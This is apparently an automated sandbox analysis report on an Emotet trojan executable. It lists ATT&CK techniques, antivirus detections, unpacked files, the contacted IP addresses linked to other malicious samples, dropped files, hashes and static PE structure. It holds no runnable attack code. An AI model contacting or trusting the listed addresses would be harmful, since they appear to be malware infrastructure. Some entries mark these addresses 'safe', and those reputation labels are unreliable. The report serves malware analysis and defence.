Domain Accounts	At (Linux)	Logon Script (Windows)	Windows Service12	Virtualization/Sandbox Evasion2	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection1	Access Token Manipulation1	NTDS	System Service Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol12	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Files and Directories1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information1	DCSync	System Information Discovery24	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
tcpmdmaus.exe	85%	Virustotal		Browse
tcpmdmaus.exe	17%	Metadefender		Browse
tcpmdmaus.exe	97%	ReversingLabs	Win32.Trojan.Emotet
tcpmdmaus.exe	100%	Avira	HEUR/AGEN.1116174
tcpmdmaus.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.2.tcpmdmaus.exe.2823d44.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.sharedconnect.exe.860000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.tcpmdmaus.exe.3b0000.0.unpack	100%	Avira	HEUR/AGEN.1135375	Download File
0.2.tcpmdmaus.exe.3b0000.0.unpack	100%	Avira	HEUR/AGEN.1135375	Download File
7.2.sharedconnect.exe.1480000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.sharedconnect.exe.1013d44.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.tcpmdmaus.exe.793d44.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.sharedconnect.exe.1470000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.0.tcpmdmaus.exe.3b0000.0.unpack	100%	Avira	HEUR/AGEN.1135375	Download File
6.0.sharedconnect.exe.3b0000.0.unpack	100%	Avira	HEUR/AGEN.1135375	Download File
5.2.tcpmdmaus.exe.3b0000.0.unpack	100%	Avira	HEUR/AGEN.1135375	Download File
6.2.sharedconnect.exe.3b0000.0.unpack	100%	Avira	HEUR/AGEN.1135375	Download File
6.2.sharedconnect.exe.770000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.tcpmdmaus.exe.7f0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.tcpmdmaus.exe.940000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.tcpmdmaus.exe.cd0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.0.sharedconnect.exe.3b0000.0.unpack	100%	Avira	HEUR/AGEN.1135375	Download File
7.2.sharedconnect.exe.3b0000.0.unpack	100%	Avira	HEUR/AGEN.1135375	Download File
0.2.tcpmdmaus.exe.950000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.sharedconnect.exe.1453d44.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://www.disneyplus.com/legal/your-california-privacy-rights	1%	Virustotal		Browse
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	Avira URL Cloud	safe
https://www.disneyplus.com/legal/privacy-policy	1%	Virustotal		Browse
https://www.disneyplus.com/legal/privacy-policy	0%	Avira URL Cloud	safe
https://77.157.40.119:443/	4%	Virustotal		Browse
https://77.157.40.119:443/	0%	Avira URL Cloud	safe
https://disneyplus.com/legal.	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
http://schemas.microsoft.co	0%	URL Reputation	safe
http://help.disneyplus.com.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://77.157.40.119:443/	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 0000000E.00000003.458714124.0000012F65020000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.458593485.0000012F64B91000.00000004.00000001.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.g5e.com/G5_End_User_License_Supplemental_Terms	svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	false		high
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 0000000E.00000003.458714124.0000012F65020000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.458593485.0000012F64B91000.00000004.00000001.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure	svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/09/enumeration	svchost.exe, 00000013.00000002.742566259.000001FAD92A8000.00000004.00000001.sdmp	false		high
https://corp.roblox.com/contact/	svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp	false		high
https://www.roblox.com/develop	svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp	false		high
http://universalstore.streaming.mediaservices.windows.net/e5f6356f-80b5-47df-960c-a214cf301822/55652	svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	false		high
https://disneyplus.com/legal.	svchost.exe, 0000000E.00000003.458714124.0000012F65020000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.458593485.0000012F64B91000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.roblox.com/info/privacy	svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp	false		high
http://crl.ver)	svchost.exe, 0000000E.00000002.477596789.0000012F642E7000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.743601011.000001FADEA18000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.g5e.com/termsofservice	svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	false		high
https://www.tiktok.com/legal/report/feedback	svchost.exe, 0000000E.00000003.459588748.0000012F65002000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://en.help.roblox.com/hc/en-us	svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp	false		high
https://corp.roblox.com/parents/	svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp	false		high
http://schemas.microsoft.co	svchost.exe, 00000013.00000002.742566259.000001FAD92A8000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://help.disneyplus.com.	svchost.exe, 0000000E.00000003.458714124.0000012F65020000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.458593485.0000012F64B91000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/r	svchost.exe, 00000013.00000002.742566259.000001FAD92A8000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
184.186.78.177	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
24.217.117.217	unknown	United States	20115	CHARTER-20115US	false
139.162.216.32	unknown	Netherlands	63949	LINODE-APLinodeLLCUS	false
77.157.40.119	unknown	France	15557	LDCOMNETFR	false
110.143.116.201	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	false
66.220.110.56	unknown	United States	4181	TDS-ASUS	false
197.82.220.82	unknown	South Africa	10474	OPTINETZA	false
212.83.128.139	unknown	France	12876	OnlineSASFR	false

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	497240
Start date:	05.10.2021
Start time:	15:41:07
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	tcpmdmaus.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.evad.winEXE@11/4@0/9
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 40.8% (good quality ratio 33.1%) Quality average: 64.5% Quality standard deviation: 37.9%
HCA Information:	Successful, ratio: 82% Number of executed functions: 89 Number of non-executed functions: 69
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.203.141.148, 20.50.102.62, 209.197.3.8, 20.54.110.249, 40.112.88.60, 93.184.220.29, 2.20.178.24, 2.20.178.33, 95.100.216.89, 20.82.210.154 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, ocsp.digicert.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:43:26	API Interceptor	1x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
184.186.78.177	Emotet.doc	Get hash	malicious	Browse
184.186.78.177	Emotet.doc	Get hash	malicious	Browse
24.217.117.217	http://suidi.com/IRS-Accounts-Transcipts-03/5/	Get hash	malicious	Browse	24.217.117.217/
	L9 2018 Payroll.doc	Get hash	malicious	Browse	24.217.117.217/
	L9 2018 Payroll.doc	Get hash	malicious	Browse	24.217.117.217/
	emotet.doc	Get hash	malicious	Browse	24.217.117.217/
	emotet.doc	Get hash	malicious	Browse	24.217.117.217/
	0521329 invoicing.doc	Get hash	malicious	Browse	24.217.117.217/
	0521329 invoicing.doc	Get hash	malicious	Browse	24.217.117.217/
	36784.exe	Get hash	malicious	Browse	24.217.117.217/
	0D73199318512570.doc	Get hash	malicious	Browse	24.217.117.217/
	[EXT] Payment status.doc	Get hash	malicious	Browse	24.217.117.217/
	[EXT] Payment status.doc	Get hash	malicious	Browse	24.217.117.217/
	emotet_43.doc	Get hash	malicious	Browse	24.217.117.217/
	emotet_43.doc	Get hash	malicious	Browse	24.217.117.217/
	INV042479428.doc	Get hash	malicious	Browse	24.217.117.217/
	INV042479428.doc	Get hash	malicious	Browse	24.217.117.217/
	9C0C7649.exe	Get hash	malicious	Browse	24.217.117.217/
	[EXT] Payment status.doc	Get hash	malicious	Browse	24.217.117.217/
	[EXT] Payment status.doc	Get hash	malicious	Browse	24.217.117.217/
	VPV-7014436651.doc	Get hash	malicious	Browse	24.217.117.217/
	VPV-7014436651.doc	Get hash	malicious	Browse	24.217.117.217/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ASN-CXA-ALL-CCI-22773-RDCUS	tcpmdmaus.exe	Get hash	malicious	Browse	184.186.78.177
	arm7-20211004-1530	Get hash	malicious	Browse	209.34.217.143
	yir8ieZzXL	Get hash	malicious	Browse	70.163.133.117
	Zot0D0dD8J	Get hash	malicious	Browse	70.181.229.157
	cu8KB5if2T	Get hash	malicious	Browse	68.96.149.188
	8qv45JJrGQ	Get hash	malicious	Browse	68.111.25.31
	lessie.arm7	Get hash	malicious	Browse	184.178.190.23
	lessie.x86	Get hash	malicious	Browse	68.102.97.252
	834V8Sq5HQ	Get hash	malicious	Browse	72.200.138.26
	CdGi0KyPWX	Get hash	malicious	Browse	204.62.73.120
	dLM8lB4AQ7	Get hash	malicious	Browse	24.120.45.59
	SN3tZLChOJ	Get hash	malicious	Browse	98.171.80.191
	CDcUegnLSd	Get hash	malicious	Browse	68.101.118.225
	sora.arm7	Get hash	malicious	Browse	68.13.191.193
	sora.x86	Get hash	malicious	Browse	68.6.255.103
	index_2021-09-30-12_54	Get hash	malicious	Browse	68.7.243.91
	Wns7odRLbP	Get hash	malicious	Browse	70.175.218.163
	te2GttY5SP	Get hash	malicious	Browse	70.167.152.11
	6IT73F9Sr1	Get hash	malicious	Browse	68.109.156.159
	X3m77l2V5l	Get hash	malicious	Browse	184.181.236.242
CHARTER-20115US	FX8w3rI5cw	Get hash	malicious	Browse	47.42.193.254
	rf8Mq00YCl.dll	Get hash	malicious	Browse	97.84.78.80
	Zot0D0dD8J	Get hash	malicious	Browse	35.131.24.189
	nMftbNUfgt	Get hash	malicious	Browse	71.88.102.148
	lessie.arm	Get hash	malicious	Browse	71.90.182.89
	NazNIp21Xu	Get hash	malicious	Browse	47.238.133.75
	vojwi3a7DD	Get hash	malicious	Browse	68.185.115.38
	02uKvQqAqD	Get hash	malicious	Browse	66.227.190.152
	P2gQCIjHzq	Get hash	malicious	Browse	68.119.71.134
	djRl6t3Lqh	Get hash	malicious	Browse	68.118.113.151
	mirai.x86	Get hash	malicious	Browse	71.14.195.190
	sora.x86	Get hash	malicious	Browse	47.7.201.76
	Wns7odRLbP	Get hash	malicious	Browse	68.189.209.109
	hVLbKSQ0zq	Get hash	malicious	Browse	68.115.120.122
	arm7	Get hash	malicious	Browse	156.19.217.42
	b3astmode.arm	Get hash	malicious	Browse	66.168.5.54
	x86	Get hash	malicious	Browse	47.135.131.124
	whoareyou.x86	Get hash	malicious	Browse	150.181.237.235
	arm	Get hash	malicious	Browse	24.177.200.244
	x86_64	Get hash	malicious	Browse	24.207.175.171

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5903632458536222
Encrypted:	false
SSDEEP:	6:0FDtek1GaD0JOCEfMuaaD0JOCEfMKQmDaS/tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0dtNGaD0JcaaD0JwQQaS/tAg/0bjSQJ
MD5:	6A977DB879538ECF271A9B3B759DA94E
SHA1:	80A7358EBBC0824951A3D071A20B1BB581CC3C89
SHA-256:	6DD20771059479B00CFB42C57B224356999DC0E8B00D7130737FEC6F79ADFEF5
SHA-512:	6710EABC657B3FF199997F56238E4BFD632F21EA75B6CD018CF391976B3893BC60D21C62AA4E49654D07A567EB025EB4D7B9167A8806D7B2A938076225F08CBE
Malicious:	false
Reputation:	low
Preview:	......:{..(......+...y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................+...y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0xfe58a2ca, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09347639506480135
Encrypted:	false
SSDEEP:	6:pAzwl/+yge1RIE11Y8TRXF4CmKzAzwl/+yge1RIE11Y8TRXF4CmK:C0+ygaO4bl+KM0+ygaO4bl+K
MD5:	C74A34D114B9EDD02FD41D7B4A8823D7
SHA1:	490E41D8B06C5A8CBBFB0BC6B4FF8C1AE65725CA
SHA-256:	8DEE8D47503401EE5003865E9059889341E7C43C27D929CC4B88C0F7DA36A302
SHA-512:	A7959F5F70FCB8CEE0E61463B67F49E166AA9EC9C2349E6B8E06D00395B46DB1AA92BC4575E109714CBC67EE843130C0CDCCC3B87D435E5F7EDE43970A893B2F
Malicious:	false
Preview:	.X..... ................e.f.3...w........................&..........w...+...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................Vp...+...ygq.....................+...yg.........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.107829924515286
Encrypted:	false
SSDEEP:	3:Sr7Ev+OOAl/bJdAtioTall:Sri+OOAt4Zy
MD5:	EF667AACA01CCCCDFD2B92821334B044
SHA1:	B326E0849830C269A7D367AF92475FE62CB8688E
SHA-256:	5B1AC376D11254DBF817DC733980A0B12D32E5B866B471DBE311FCF4243D3596
SHA-512:	41351517A1E823A91B204DB86655AAD80CFCB86C97A1731FCC75AAEE93F299C753FFF9194CFC74508443BB72A54022CCF292C3ADA6FCC7328ECBFA5D904276A6
Malicious:	false
Preview:	...(.....................................3...w...+...yg......w...............w.......w....:O.....w.......................+...yg.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.458919584976166
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	tcpmdmaus.exe
File size:	280576
MD5:	abe13ddc14525c4c35a85224689bfb27
SHA1:	01b8022edd4ef8e9ab20807c032b7ce2849b3df3
SHA256:	8524e558dded9665e69541b332d556e43c007d0d4001fe5355ac4816c22e7a21
SHA512:	1592bd7a07aff9f04f44ecbdc049daef083e943cd2e930a9bd40ab1f7fbab71ae23c8229a3857b8917c7fc93427827fc0b9a02db2cb5a4a0351fc914eecee834
SSDEEP:	1536:y1dwtM1uD1drq12rh0PC4nRh87bEOYPyGy5oBu7WiKT:Y7uDDq8qHnRsbEjP/u7I
File Content Preview:	MZ......................@........................................st.!.am.nL.7r....dern32.u....!..i...g!. .e!..$MZ.. mu.bThrL. un ....This pro W.........PE..L...`d.[..........................................@.......................................@........

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40100f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5B1E6460 [Mon Jun 11 12:00:32 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	0b7b2a1ae1bd9f4631da141abed1aa7d

Entrypoint Preview

Instruction
jmp 00007F57B0A03909h
jmp 00007F57B0A0C351h
jmp 00007F57B0A0592Bh
jmp 00007F57B09FF185h
jmp 00007F57B09F9A5Ah
jmp 00007F57B09F94DCh
jmp 00007F57B0A0B0C9h
jmp 00007F57B09F9226h
jmp 00007F57B09FDF31h
jmp 00007F57B0A09F7Ch
jmp 00007F57B09FAD58h
jmp 00007F57B09F939Ah
jmp 00007F57B09F955Eh
jmp 00007F57B0A09FD5h
jmp 00007F57B09F9351h
jmp 00007F57B0A06AD9h
jmp 00007F57B09F9A0Dh
jmp 00007F57B0A0593Eh
jmp 00007F57B09F92ECh
jmp 00007F57B09F9B54h
jmp 00007F57B0A07ADBh
jmp 00007F57B09F9347h
jmp 00007F57B0A026F0h
jmp 00007F57B09F91F3h
jmp 00007F57B0A0026Eh
jmp 00007F57B09FCD5Bh
jmp 00007F57B0A048A6h
jmp 00007F57B0A08EB4h
jmp 00007F57B0A0D550h
jmp 00007F57B09FBCFAh
jmp 00007F57B0A0F862h
jmp 00007F57B0A02792h
jmp 00007F57B09F9388h
jmp 00007F57B0A0150Bh
jmp 00007F57B0A0E765h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0xfffff000
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1c148	0x8d	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x43000	0x5e4c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x49000	0x154	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x19000	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1c000	0x148	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x17898	0x17a00	False	0.0648044808201	data	0.983565645054	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x19000	0x46c	0x600	False	0.238932291667	data	1.7374447372	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bT	0x1a000	0x16eb	0x400	False	0.576171875	data	4.5070923188	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x1c000	0x59a	0x600	False	0.257161458333	data	2.47810388592	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_MEM_READ
D	0x1d000	0x127ec	0x12800	False	0.308290223818	data	5.2061094126	IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_DSECT, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.crt0	0x30000	0xccbc	0xce00	False	0.561343294903	data	5.66222181743	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
cji8	0x3d000	0x5dd3	0x5e00	False	0.00835272606383	data	4.06889527583	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x43000	0x5e4c	0x6000	False	0.133138020833	data	3.29366479111	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x49000	0x472	0x600	False	0.209635416667	data	1.61290752237	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_DIALOG	0x435a0	0x250	data
RT_DIALOG	0x437f0	0x254	data
RT_DIALOG	0x43a48	0x24c	data
RT_DIALOG	0x43c98	0x248	data
RT_DIALOG	0x43ee0	0x240	data
RT_DIALOG	0x44120	0x248	data
RT_DIALOG	0x44368	0x230	data
RT_DIALOG	0x44598	0x23c	data
RT_DIALOG	0x447d8	0x22c	data
RT_DIALOG	0x44a08	0x164	data
RT_DIALOG	0x44b70	0x234	data	Bulgarian	Bulgaria
RT_DIALOG	0x44da8	0x1d8	data	Chinese	Taiwan
RT_DIALOG	0x44f80	0x248	data	Czech	Czech Republic
RT_DIALOG	0x451c8	0x244	data	Danish	Denmark
RT_DIALOG	0x45410	0x268	data	Greek	Greece
RT_DIALOG	0x45678	0x164	data	English	United States
RT_DIALOG	0x457e0	0x248	data	Finnish	Finland
RT_DIALOG	0x45a28	0x21c	data	Hebrew	Israel
RT_DIALOG	0x45c48	0x240	data	Hungarian	Hungary
RT_DIALOG	0x45e88	0x1e0	data	Japanese	Japan
RT_DIALOG	0x46068	0x1f8	data	Korean	North Korea
RT_DIALOG	0x46068	0x1f8	data	Korean	South Korea
RT_DIALOG	0x46260	0x260	data	Polish	Poland
RT_DIALOG	0x464c0	0x250	data	Romanian	Romania
RT_DIALOG	0x46710	0x218	data	Russian	Russia
RT_DIALOG	0x46928	0x238	data	Croatian	Croatia
RT_DIALOG	0x46b60	0x244	data	Slovak	Slovakia
RT_DIALOG	0x46da8	0x24c	data	Thai	Thailand
RT_DIALOG	0x46ff8	0x250	data	Turkish	Turkey
RT_DIALOG	0x47248	0x234	data	Slovenian	Slovenia
RT_DIALOG	0x47480	0x268	data	Vietnamese	Vietnam
RT_DIALOG	0x476e8	0x1d8	data	Chinese	China
RT_DIALOG	0x478c0	0x23c	data	Portuguese	Portugal
RT_VERSION	0x47b00	0x358	data
RT_MANIFEST	0x47e58	0x56	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
GDI32.dll	GetOutlineTextMetricsW
USER32.dll	CreateIconIndirect, GetGUIThreadInfo, ReleaseCapture, wsprintfA
ADVAPI32.dll	AddUsersToEncryptedFile
WinSCard.dll	SCardGetProviderIdA
